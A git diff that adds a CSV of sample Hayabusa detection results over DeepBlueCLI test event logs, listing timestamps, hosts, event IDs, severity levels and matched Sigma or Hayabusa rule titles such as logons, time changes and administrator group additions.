diff --git a/sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.csv b/sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.csv
new file mode 100644
index 00000000..0ae6f001
--- /dev/null
+++ b/sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.csv
@@ -0,0 +1,10073 @@ +Timestamp,Computer,EventID,Level,RuleTitle,Details,RulePath,FilePath +2013-10-24 01:16:13.843 +09:00,37L4247D28-05,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:16:29.000 +09:00,37L4247D28-05,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 01:17:44.109 +09:00,37L4247D28-05,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:17:44.109 +09:00,37L4247D28-05,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:18:09.203 +09:00,37L4247D28-05,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:18:33.828 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:18:33.828 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:18:50.500 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:21:30.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public 
IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 01:21:33.630 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:21:33.630 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:21:33.630 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:39.911 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:22:39.911 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:22:39.911 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,medium,Local user account created,User: IEUser : SID:S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx +2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,medium,Local user account created,User: IEUser : 
SID:S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3463664321-2923530833-3546627382-1000 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx +2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3463664321-2923530833-3546627382-1000 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:40.005 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:22:40.005 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:22:44.979 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: WIN-QALA5Q3KJ43$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: WIN-QALA5Q3KJ43 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x298c5 : (Warning: Credentials are stored in 
memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: WIN-QALA5Q3KJ43 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x29908 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:44.979 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x298c5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:23:39.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 01:23:39.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 01:24:00.130 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:24:00.130 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:24:00.161 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:24:53.630 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate 
Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:27:48.911 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:27:48.911 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:27:21.754 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x29908,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:30:47.140 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:30:47.140 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:30:52.625 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:30:58.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:31:10.741 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:31:10.741 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:31:10.741 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:32:53.796 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:32:53.796 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:33:10.078 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:33:18.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:33:31.593 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:33:31.593 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:33:31.593 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:35:55.000 +09:00,IE8Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:35:55.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:36:53.671 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x57d5b : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x57d8d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:36:53.671 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x57d5b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:45:29.131 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:29.131 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:29.131 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:45:45.037 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x57d8d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:49:38.890 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:49:38.890 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:50:25.546 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:50:27.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:50:33.551 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:50:33.551 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:50:33.551 +09:00,IE8Win7,4616,medium,Unauthorized System Time 
Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:51:17.207 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27f43 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27f73 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:51:17.207 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x27f43,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:53:48.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:53:48.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 03:48:37.144 +09:00,IE8Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:48:37.144 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:49:28.191 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:02:24.316 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x27f73,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:04:09.406 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:04:09.406 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:04:28.750 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:04:55.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:05:04.098 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:05:04.098 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:05:04.098 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:05:59.484 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:05:59.484 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:06:18.921 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:06:25.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:07:16.729 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:07:16.729 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:07:16.729 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:10:27.000 +09:00,IE8Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:10:27.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:19:23.812 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:19:23.812 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:19:46.750 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:19:52.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:20:01.879 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:20:01.879 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:20:01.879 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:22:39.125 +09:00,IE8Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:22:39.125 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:23:04.093 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:23:08.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:23:18.798 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:23:18.798 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:23:18.798 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:25:30.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:25:30.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:27:14.204 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : 
Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x39a20 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x39a67 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:27:14.204 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x39a20,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:34:54.649 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x39a67,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:36:30.093 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:36:30.093 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:36:39.718 +09:00,IE8Win7,4624,informational,Logon Type 0 - 
System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:36:44.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:36:53.245 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:36:53.245 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:36:53.245 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:38:41.448 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x24902 : (Warning: Credentials are stored in 